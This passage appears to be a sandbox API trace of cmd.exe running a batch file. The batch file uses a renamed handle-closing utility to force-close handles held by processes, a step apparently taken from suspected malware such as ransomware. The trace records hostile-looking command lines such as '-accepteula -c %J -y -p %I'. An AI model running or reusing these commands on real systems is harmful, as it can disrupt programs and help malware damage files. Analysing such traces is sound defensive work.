lpNumberOfCharsWritten=0x31f518, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x31f518*=0x20) returned 1 [0178.559] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0x31f52c | out: _Buffer=" %I IN ") returned 7 [0178.559] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.559] GetFileType (hFile=0x7) returned 0x2 [0178.559] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0178.559] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x31f4ec | out: lpMode=0x31f4ec) returned 1 [0178.560] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.560] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x31f518, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x31f518*=0x7) returned 1 [0178.562] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0x31f528 | out: _Buffer="(`tdq963ii.exe -accepteula \"Workflow.Targets\" -nobanner`) DO ") returned 61 [0178.562] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.562] GetFileType (hFile=0x7) returned 0x2 [0178.562] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0178.562] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x31f4e8 | out: lpMode=0x31f4e8) returned 1 [0178.563] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.563] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x3d, lpNumberOfCharsWritten=0x31f514, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x31f514*=0x3d) returned 1 [0178.563] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.563] GetFileType (hFile=0x7) returned 0x2 [0178.564] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0178.564] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x31f4f4 | out: lpMode=0x31f4f4) returned 1 [0178.564] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.564] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dbbd04*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x31f520, lpReserved=0x0 | out: lpBuffer=0x49dbbd04*, lpNumberOfCharsWritten=0x31f520*=0x1) returned 1 [0178.564] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.564] GetFileType (hFile=0x7) returned 0x2 [0178.565] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0178.565] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x31f4d8 | out: lpMode=0x31f4d8) returned 1 [0178.565] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.565] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x3b4d10*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x31f504, lpReserved=0x0 | out: lpBuffer=0x3b4d10*, lpNumberOfCharsWritten=0x31f504*=0xc) returned 1 [0178.566] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x31f510 | out: _Buffer=" -accepteula -c %J -y -p %I -nobanner ") returned 38 [0178.566] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.566] GetFileType (hFile=0x7) returned 0x2 [0178.566] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0178.566] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x31f4d0 | out: lpMode=0x31f4d0) returned 1 [0178.566] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.566] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x31f4fc, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x31f4fc*=0x26) returned 1 [0178.568] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x31f52c | out: _Buffer=") ") returned 2 [0178.568] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.568] GetFileType (hFile=0x7) returned 0x2 [0178.569] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0178.569] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x31f4ec | out: lpMode=0x31f4ec) returned 1 [0178.569] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.569] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x31f518, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x31f518*=0x2) returned 1 [0178.570] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x31f54c | out: _Buffer="\r\n") returned 2 [0178.570] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.570] GetFileType (hFile=0x7) returned 0x2 [0178.570] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0178.570] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x31f50c | out: lpMode=0x31f50c) returned 1 [0178.571] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.571] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x31f538, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x31f538*=0x2) returned 1 [0178.573] GetProcessHeap () returned 0x3a0000 [0178.573] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x2c) returned 0x3b4d98 [0178.573] GetProcessHeap () returned 0x3a0000 [0178.573] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0xc) returned 0x3b4540 [0178.573] GetProcessHeap () returned 0x3a0000 [0178.573] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0xc) returned 0x3b4558 [0178.573] GetProcessHeap () returned 0x3a0000 [0178.573] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0xe) returned 0x3b4570 [0178.573] _wcsnicmp (_String1="UseBackQ", _String2="usebackq", _MaxCount=0x8) returned 0 [0178.573] _wcsnicmp (_String1="Tokens=3", _String2="usebackq", _MaxCount=0x8) returned -1 [0178.573] _wcsnicmp (_String1="Tokens=", _String2="useback", _MaxCount=0x7) returned -1 [0178.573] _wcsnicmp (_String1="Toke", _String2="eol=", _MaxCount=0x4) returned 15 [0178.573] _wcsnicmp (_String1="Tokens=", _String2="delims=", _MaxCount=0x7) returned 16 [0178.573] _wcsnicmp (_String1="Token", _String2="skip=", _MaxCount=0x5) returned 1 [0178.573] _wcsnicmp (_String1="Tokens=", _String2="tokens=", _MaxCount=0x7) returned 0 [0178.573] wcstol (in: _String="3,6 delims=: \"", _EndPtr=0x31f468, _Radix=0 | out: _EndPtr=0x31f468*=",6 delims=: \"") returned 3 [0178.573] wcstol (in: _String="6 delims=: \"", _EndPtr=0x31f468, _Radix=0 | out: _EndPtr=0x31f468*=" delims=: \"") returned 6 [0178.573] _wcsnicmp (_String1="delims=:", _String2="usebackq", _MaxCount=0x8) returned -17 [0178.573] _wcsnicmp (_String1="delims=", _String2="useback", _MaxCount=0x7) returned -17 [0178.573] _wcsnicmp (_String1="deli", _String2="eol=", _MaxCount=0x4) returned -1 [0178.573] _wcsnicmp (_String1="delims=", _String2="delims=", _MaxCount=0x7) returned 0 [0178.574] GetProcessHeap () returned 0x3a0000 [0178.574] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b4570 | out: hHeap=0x3a0000) returned 1 [0178.574] GetProcessHeap () returned 0x3a0000 [0178.574] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0xe) returned 0x3b4570 [0178.574] GetProcessHeap () returned 0x3a0000 [0178.574] RtlReAllocateHeap (Heap=0x3a0000, Flags=0x0, Ptr=0x3b4540, Size=0xe) returned 0x3b4588 [0178.574] GetProcessHeap () returned 0x3a0000 [0178.574] RtlSizeHeap (HeapHandle=0x3a0000, Flags=0x0, MemoryPointer=0x3b4588) returned 0xe [0178.574] GetProcessHeap () returned 0x3a0000 [0178.574] RtlReAllocateHeap (Heap=0x3a0000, Flags=0x0, Ptr=0x3b4558, Size=0x14) returned 0x3b4dd0 [0178.574] GetProcessHeap () returned 0x3a0000 [0178.574] RtlSizeHeap (HeapHandle=0x3a0000, Flags=0x0, MemoryPointer=0x3b4dd0) returned 0x14 [0178.574] _wpopen (_Command="tdq963ii.exe -accepteula \"Workflow.Targets\" -nobanner", _Mode="rb") returned 0x77032960 [0178.619] feof (_File=0x77032960) returned 0 [0178.619] ferror (_File=0x77032960) returned 0 [0178.619] GetProcessHeap () returned 0x3a0000 [0178.619] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x108) returned 0x3b4df0 [0178.619] fgets (in: _Buf=0x3b4df8, _MaxCount=256, _File=0x77032960 | out: _Buf="No matching handles found.\r\r\n", _File=0x77032960) returned="No matching handles found.\r\r\n" [0227.503] feof (_File=0x77032960) returned 0 [0227.504] ferror (_File=0x77032960) returned 0 [0227.504] GetProcessHeap () returned 0x3a0000 [0227.504] RtlReAllocateHeap (Heap=0x3a0000, Flags=0x0, Ptr=0x3b4df0, Size=0x208) returned 0x3b4df0 [0227.504] GetProcessHeap () returned 0x3a0000 [0227.504] RtlSizeHeap (HeapHandle=0x3a0000, Flags=0x0, MemoryPointer=0x3b4df0) returned 0x208 [0227.504] fgets (in: _Buf=0x3b4e15, _MaxCount=483, _File=0x77032960 | out: _Buf="", _File=0x77032960) returned 0x0 [0229.757] _pclose (in: _File=0x77032960 | out: _File=0x77032960) returned 0 [0229.759] GetProcessHeap () returned 0x3a0000 [0229.759] RtlReAllocateHeap (Heap=0x3a0000, Flags=0x0, Ptr=0x3b4df0, Size=0x46) returned 0x3b4df0 [0229.759] GetProcessHeap () returned 0x3a0000 [0229.759] RtlSizeHeap (HeapHandle=0x3a0000, Flags=0x0, MemoryPointer=0x3b4df0) returned 0x46 [0229.759] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x3b4e15, cbMultiByte=29, lpWideCharStr=0x3b4df8, cchWideChar=29 | out: lpWideCharStr="No matching handles found.\r\r\n") returned 29 [0229.760] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x31f15c | out: _Buffer="\r\n") returned 2 [0229.760] _get_osfhandle (_FileHandle=1) returned 0x7 [0229.760] GetFileType (hFile=0x7) returned 0x2 [0229.762] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0229.762] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x31f11c | out: lpMode=0x31f11c) returned 1 [0229.763] _get_osfhandle (_FileHandle=1) returned 0x7 [0229.763] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x31f148, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x31f148*=0x2) returned 1 [0229.768] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0229.768] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x31f158 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0229.769] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x31f158 | out: _Buffer=">") returned 1 [0229.769] _get_osfhandle (_FileHandle=1) returned 0x7 [0229.769] GetFileType (hFile=0x7) returned 0x2 [0229.769] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0229.769] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x31f120 | out: lpMode=0x31f120) returned 1 [0229.770] _get_osfhandle (_FileHandle=1) returned 0x7 [0229.770] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x31f14c, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x31f14c*=0x26) returned 1 [0229.770] _get_osfhandle (_FileHandle=1) returned 0x7 [0229.770] GetFileType (hFile=0x7) returned 0x2 [0229.771] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0229.771] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x31f3a4 | out: lpMode=0x31f3a4) returned 1 [0229.771] _get_osfhandle (_FileHandle=1) returned 0x7 [0229.771] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dbbd04*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x31f3d0, lpReserved=0x0 | out: lpBuffer=0x49dbbd04*, lpNumberOfCharsWritten=0x31f3d0*=0x1) returned 1 [0229.772] _get_osfhandle (_FileHandle=1) returned 0x7 [0229.772] GetFileType (hFile=0x7) returned 0x2 [0229.772] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0229.772] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x31f388 | out: lpMode=0x31f388) returned 1 [0229.773] _get_osfhandle (_FileHandle=1) returned 0x7 [0229.773] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x3c43b0*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x31f3b4, lpReserved=0x0 | out: lpBuffer=0x3c43b0*, lpNumberOfCharsWritten=0x31f3b4*=0xc) returned 1 [0229.773] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x31f3c0 | out: _Buffer=" -accepteula -c -y -p handles -nobanner ") returned 41 [0229.773] _get_osfhandle (_FileHandle=1) returned 0x7 [0229.773] GetFileType (hFile=0x7) returned 0x2 [0229.773] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0229.774] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x31f380 | out: lpMode=0x31f380) returned 1 [0229.774] _get_osfhandle (_FileHandle=1) returned 0x7 [0229.774] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x29, lpNumberOfCharsWritten=0x31f3ac, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x31f3ac*=0x29) returned 1 [0229.776] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x31f3dc | out: _Buffer=") ") returned 2 [0229.776] _get_osfhandle (_FileHandle=1) returned 0x7 [0229.776] GetFileType (hFile=0x7) returned 0x2 [0229.777] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0229.777] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x31f39c | out: lpMode=0x31f39c) returned 1 [0229.777] _get_osfhandle (_FileHandle=1) returned 0x7 [0229.777] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x31f3c8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x31f3c8*=0x2) returned 1 [0229.777] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x31f3fc | out: _Buffer="\r\n") returned 2 [0229.777] _get_osfhandle (_FileHandle=1) returned 0x7 [0229.778] GetFileType (hFile=0x7) returned 0x2 [0229.778] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0229.778] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x31f3bc | out: lpMode=0x31f3bc) returned 1 [0229.778] _get_osfhandle (_FileHandle=1) returned 0x7 [0229.778] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x31f3e8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x31f3e8*=0x2) returned 1 [0229.780] GetConsoleTitleW (in: lpConsoleTitle=0x31ef0c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0229.782] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3b5060, lpFilePart=0x31ea2c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x31ea2c*="Desktop") returned 0x25 [0229.782] SetErrorMode (uMode=0x0) returned 0x1 [0229.782] GetProcessHeap () returned 0x3a0000 [0229.782] RtlReAllocateHeap (Heap=0x3a0000, Flags=0x0, Ptr=0x3b5058, Size=0x6e) returned 0x3b5058 [0229.782] GetProcessHeap () returned 0x3a0000 [0229.782] RtlSizeHeap (HeapHandle=0x3a0000, Flags=0x0, MemoryPointer=0x3b5058) returned 0x6e [0229.783] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0229.783] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0229.783] GetProcessHeap () returned 0x3a0000 [0229.783] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x120) returned 0x3b50d0 [0229.783] GetProcessHeap () returned 0x3a0000 [0229.783] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x238) returned 0x3b51f8 [0229.783] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0229.784] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe", fInfoLevelId=0x1, lpFindFileData=0x31e7c8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x31e7c8) returned 0x3b53a8 [0229.784] FindClose (in: hFindFile=0x3b53a8 | out: hFindFile=0x3b53a8) returned 1 [0229.784] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0229.784] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0229.784] GetConsoleTitleW (in: lpConsoleTitle=0x31eca0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0229.785] InitializeProcThreadAttributeList (in: lpAttributeList=0x31eb28, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x31ebf0 | out: lpAttributeList=0x31eb28, lpSize=0x31ebf0) returned 1 [0229.785] UpdateProcThreadAttribute (in: lpAttributeList=0x31eb28, dwFlags=0x0, Attribute=0x60001, lpValue=0x31ebe8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x31eb28, lpPreviousValue=0x0) returned 1 [0229.785] GetStartupInfoW (in: lpStartupInfo=0x31eae4 | out: lpStartupInfo=0x31eae4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0229.785] lstrcmpW (lpString1="\\tdq963ii.exe", lpString2="\\XCOPY.EXE") returned -1 [0229.785] CreateProcessW (in: lpApplicationName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe", lpCommandLine="tdq963ii.exe -accepteula -c -y -p handles -nobanner", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x31eb84*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula -c -y -p handles -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x31ebd0 | out: lpCommandLine="tdq963ii.exe -accepteula -c -y -p handles -nobanner", lpProcessInformation=0x31ebd0*(hProcess=0x74, hThread=0x84, dwProcessId=0xb68, dwThreadId=0x544)) returned 1 [0229.803] CloseHandle (hObject=0x84) returned 1 [0229.803] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0229.803] GetProcessHeap () returned 0x3a0000 [0229.803] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b6e30 | out: hHeap=0x3a0000) returned 1 [0229.804] GetEnvironmentStringsW () returned 0x3b62a0* [0229.804] GetProcessHeap () returned 0x3a0000 [0229.804] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0xb88) returned 0x3b6e30 [0229.804] FreeEnvironmentStringsW (penv=0x3b62a0) returned 1 [0229.804] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0232.943] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x31eac4 | out: lpExitCode=0x31eac4*=0x1) returned 1 [0232.944] CloseHandle (hObject=0x74) returned 1 [0232.944] _vsnwprintf (in: _Buffer=0x31ec0c, _BufferCount=0x13, _Format="%08X", _ArgList=0x31ead0 | out: _Buffer="00000001") returned 8 [0232.944] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0232.944] GetProcessHeap () returned 0x3a0000 [0232.944] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b6e30 | out: hHeap=0x3a0000) returned 1 [0232.944] GetEnvironmentStringsW () returned 0x3b62a0* [0232.944] GetProcessHeap () returned 0x3a0000 [0232.944] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0xb88) returned 0x3b6e30 [0232.944] FreeEnvironmentStringsW (penv=0x3b62a0) returned 1 [0232.944] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0232.944] GetProcessHeap () returned 0x3a0000 [0232.944] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b6e30 | out: hHeap=0x3a0000) returned 1 [0232.944] GetEnvironmentStringsW () returned 0x3b62a0* [0232.944] GetProcessHeap () returned 0x3a0000 [0232.944] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0xb88) returned 0x3b6e30 [0232.944] FreeEnvironmentStringsW (penv=0x3b62a0) returned 1 [0232.944] GetProcessHeap () returned 0x3a0000 [0232.944] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b4558 | out: hHeap=0x3a0000) returned 1 [0232.944] DeleteProcThreadAttributeList (in: lpAttributeList=0x31eb28 | out: lpAttributeList=0x31eb28) [0232.944] GetProcessHeap () returned 0x3a0000 [0232.944] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b4df0 | out: hHeap=0x3a0000) returned 1 [0232.944] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.944] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0232.945] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.945] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0232.946] _get_osfhandle (_FileHandle=0) returned 0x3 [0232.946] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0232.946] SetConsoleInputExeNameW () returned 0x1 [0232.946] GetConsoleOutputCP () returned 0x1b5 [0232.946] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0232.946] SetThreadUILanguage (LangId=0x0) returned 0x409 [0232.946] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x31f4f4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0232.947] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0232.947] _get_osfhandle (_FileHandle=3) returned 0x74 [0232.947] SetFilePointer (in: hFile=0x74, lDistanceToMove=226, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0232.947] GetProcessHeap () returned 0x3a0000 [0232.947] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b5328 | out: hHeap=0x3a0000) returned 1 [0232.948] GetProcessHeap () returned 0x3a0000 [0232.948] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b51f8 | out: hHeap=0x3a0000) returned 1 [0232.948] GetProcessHeap () returned 0x3a0000 [0232.948] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b50d0 | out: hHeap=0x3a0000) returned 1 [0232.948] GetProcessHeap () returned 0x3a0000 [0232.948] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b5058 | out: hHeap=0x3a0000) returned 1 [0232.948] GetProcessHeap () returned 0x3a0000 [0232.948] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3c24c0 | out: hHeap=0x3a0000) returned 1 [0232.948] GetProcessHeap () returned 0x3a0000 [0232.948] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b4e40 | out: hHeap=0x3a0000) returned 1 [0232.948] GetProcessHeap () returned 0x3a0000 [0232.948] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3c43f0 | out: hHeap=0x3a0000) returned 1 [0232.948] GetProcessHeap () returned 0x3a0000 [0232.948] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3c43a8 | out: hHeap=0x3a0000) returned 1 [0232.948] GetProcessHeap () returned 0x3a0000 [0232.948] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b4570 | out: hHeap=0x3a0000) returned 1 [0232.948] GetProcessHeap () returned 0x3a0000 [0232.948] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b4dd0 | out: hHeap=0x3a0000) returned 1 [0232.948] GetProcessHeap () returned 0x3a0000 [0232.948] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b4588 | out: hHeap=0x3a0000) returned 1 [0232.948] GetProcessHeap () returned 0x3a0000 [0232.948] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b4d98 | out: hHeap=0x3a0000) returned 1 [0232.948] GetProcessHeap () returned 0x3a0000 [0232.948] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b4d38 | out: hHeap=0x3a0000) returned 1 [0232.948] GetProcessHeap () returned 0x3a0000 [0232.948] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b4d08 | out: hHeap=0x3a0000) returned 1 [0232.949] GetProcessHeap () returned 0x3a0000 [0232.949] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b4ca8 | out: hHeap=0x3a0000) returned 1 [0232.949] GetProcessHeap () returned 0x3a0000 [0232.949] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b4c48 | out: hHeap=0x3a0000) returned 1 [0232.949] GetProcessHeap () returned 0x3a0000 [0232.949] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b4bc8 | out: hHeap=0x3a0000) returned 1 [0232.949] GetProcessHeap () returned 0x3a0000 [0232.949] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b4b70 | out: hHeap=0x3a0000) returned 1 [0232.949] GetProcessHeap () returned 0x3a0000 [0232.949] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3af538 | out: hHeap=0x3a0000) returned 1 [0232.949] GetProcessHeap () returned 0x3a0000 [0232.949] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b4b20 | out: hHeap=0x3a0000) returned 1 [0232.949] GetProcessHeap () returned 0x3a0000 [0232.949] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b4ac0 | out: hHeap=0x3a0000) returned 1 [0232.949] _get_osfhandle (_FileHandle=3) returned 0x74 [0232.949] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0232.949] ReadFile (in: hFile=0x74, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x31f4d8, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x31f4d8*=0x0, 